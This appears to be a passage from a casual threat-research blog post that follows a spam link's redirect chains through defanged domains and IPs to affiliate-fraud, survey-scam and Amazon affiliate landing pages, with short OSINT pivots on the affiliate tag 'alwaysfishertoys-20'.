2. brightisles[.]com | 173.214[.]175[.]106
3. droppricealert[.]com | 206.72[.]207[.]253
4. click[.]linksynergy[.]com | 34.198[.]100[.]55







POSSIBLE AFFILIATE FRAUD DETECTED!!
More research is needed but there could be Affiliate Partner Information in the observed URL and delivered COOKIES, indicating possible fraudulent activity.




"Auto Parts Warehouse is an American online retailer of automotive parts and accessories for cars, vans, trucks, and sport utility vehicles."

Parent organization: U.S. Auto Parts
Headquarters: Carson, CA
Founded: 1995


------------------------------------------------
REQUEST #2 - LANDING PAGE & SEQUENCE:
1. Clicking the link 'hXXp://wffw[.]jenniferashe[.]net/BQ' redirects us through 3 different domains & 1 IP ADDR and then to the final landing page below.

FINAL LANDING PAGE (truncated):
hXXp://internet4[.]revieworbit[.]com/?isp=Comcast%20Cable%20Communications%20inc.&country=US&utm_source=Advertise.com&utm_content=46355-7337_243187&utm_term=&utm_campaign=us&utm_medium=e56-2-4-aa-72&voluumdata=BASE64dmlkL&affsub=46355-7337_243187&terms_html=ellens%20emoji%20exploji%20itunes&terms_html_kw=ellens%20emoji%20exploji%20itunes&xsite=xsite}&epc=0.0130&sid=1499039022595_1499039007225_114_624_61407805_1

REDIRECT SEQUENCE:
1. xmlfeed[.]info:8080 | 216.172.56[.]21
2. 64.15.72[.]104 | 64.15.72[.]104
3. ml8730[.]com | 38.107.161[.]250
4. track[.]spdtrck[.]pro | 52.86.58[.]112







SURVEY/SCUMWARE DETECTED!!
More research is needed but there could be RISK in clicking buttons on the site (completing the Survey is not recommended).



QUICK OSINT LOOKUP:
Lookup top referrals and destination sites using Similar Web.

TOP REFS TO REVIEWORBIT[.]COM:
kissanime[.]ru
vq40567[.]com
vq78391[.]com
wd15303[.]com
credittipstoday[.]com

TOP REFS/DESTS FROM SIMILARWEB:
https://www.similarweb.com/website/revieworbit.com#referrals

------------------------------------------------
REQUEST #3 - LANDING PAGE & SEQUENCE:
1. Clicking the link 'hXXp://wffw[.]jenniferashe[.]net/BQ' redirects us through 3 different domains & 1 IP ADDR and then to the final landing page below.

FINAL LANDING PAGE:
hxxp://vitalworldnews[.]com/ob/?AffiliateReferenceID=1499026682299_1499026669282_121_71828_59656669_1

REDIRECT SEQUENCE:
1. xmlfeed.info:8080 | 216.172.56[.]21
2. 64.15.72[.]104 | 64.15.72[.]104
3. ml8730[.]com | 38.107.161[.]250
4. vitalworldnews[.]com | 104.198.183[.]107


QUICK PIVOT - OUTBRAIN DETECTED!:
<div class="OUTBRAIN">
http://widgets.outbrain.com/outbrain.js



------------------------------------------------
REQUEST #4 - LANDING PAGE & SEQUENCE:
1. Clicking the link 'hXXp://wffw[.]jenniferashe[.]net/BQ' redirects us through 2 different domains & 1 IP ADDR, then to an unknown destination, and finally to the landing page below.

FINAL LANDING PAGE:
hXXps://www[.]amazon[.]com/VideoSecu-ML531BE-Monitor-Articulating-Extension/dp/B000WYVBR0?
psc=1&SubscriptionId=AKIAJ2AME6KQOPD23XQQ&tag=alwaysfishertoys-20&linkCode=xm2&camp=2025&creative=165953&creativeASIN=B000WYVBR0



REDIRECT SEQUENCE:
1. 64.15.72[.]104 | 64.15.72[.]104
2. go[.]quali-bid[.]com:17777 | 64.15[.]72[.]46
3. brightisles[.]com | 173.214[.]175[.]106
4. UNKNOWN





AMAZON AFFILIATE PARTNER FRAUD?:
alwaysfishertoys-20




!!!!!!    CHOOSE YOUR OWN ADVENTURE TIME    !!!!!!

Before closing out this investigation, let's make a quick OSINT check into this "alwaysfishertoys-20" Amazon Affiliate Partner.

1. Google search for the following:
alwaysfishertoys



2. Clicking on the GOOGLE SEARCH RESULT shown above loads the following website:
hXXp://saginawcounty[.]com/n1site/apps/LeaveSite.aspx?url=alwaysfishertoys.com%2Fs%3Fsearch%3Dmanual%2Bjuice%2Bpress%2BB01KKD1R0S

What the shit is this? Looks like someone is trying to drive traffic to Amazon for financial gain!



"You are about to be redirected to another site. If this does not happen automatically in 5 seconds, click the link below."



REDIRECT LEADS TO:
hXXp://alwaysfishertoys[.]com/s?search=manual+juice+press+B01KKD1R0S


WHICH LINKS TO:
https://www.amazon.com/Chef-Kitchen-Tools-Manual-Juicer/dp/B01KKD1R0S?SubscriptionId=AKIAJ2AME6KQOPD23XQQ&tag=alwaysfishertoys-20&linkCode=xm2&camp=2025&creative=165953&creativeASIN=B01KKD1R0S

------------------------------------------------------------------

LAST QUICK OSINT CHECK - SIMILARWEB (ALWAYSFISHERTOYS.COM)
Notice the previously observed domain 'brightisles[.]com' is on the TOP 5 REFERRING SITES list! There's some connections to be made round these here rabbitholes...but for now...


(https://www.similarweb.com/website/alwaysfishertoys[.]com#referrals)

------------------------------------------------------------------
!!!!!!    CHOOSE YOUR OWN ADVENTURE TIME    !!!!!!

I choose to take a carrot break here. That's right...we're all done for now. Until next time...